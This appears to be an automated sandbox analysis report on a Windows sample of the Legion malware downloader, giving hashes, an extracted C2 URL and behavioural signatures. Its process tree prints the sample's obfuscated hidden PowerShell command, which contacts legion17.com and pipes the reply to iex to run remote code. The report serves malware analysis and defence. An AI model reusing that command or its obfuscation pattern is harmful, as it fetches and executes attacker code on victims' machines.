Analysis
-
max time kernel
63s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
16-06-2022 09:22
Static task
static1
Behavioral task
behavioral1
Sample
262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe
Resource
win10v2004-20220414-en
General
-
Target
262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe
-
Size
184KB
-
MD5
2822431899265acfe0116a193ff7eb86
-
SHA1
19b65753f8b60664b371b28680b5d4ce7660af2a
-
SHA256
262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041
-
SHA512
11bf4b1bc5217564c03811608ad7adce819925dd47daa6f01eca31a9f0aa46f519b93635efc44f7e7422f44650cb2fa6d4f024dbf52dfb77e26ccb6793267797
Malware Config
Extracted
http://legion17.com/legion17/welcome
Signatures
-
Legion
Legion is a malware downloader written in C++.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 4472 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4472 powershell.exe 4472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4472 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3212 wrote to memory of 2800 3212 262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe 81 PID 3212 wrote to memory of 2800 3212 262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe 81 PID 3212 wrote to memory of 2800 3212 262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe 81 PID 2800 wrote to memory of 4472 2800 cmd.exe 83 PID 2800 wrote to memory of 4472 2800 cmd.exe 83 PID 2800 wrote to memory of 4472 2800 cmd.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe"C:\Users\Admin\AppData\Local\Temp\262f5901d5463b9d191893b4873cd9e88d3c87f43e91d1f984d956167c063041.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##################@(n#ew###-#ob#jec#t N#####et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.com/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"2⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##################@(n#ew###-#ob#jec#t N#####et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.com/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-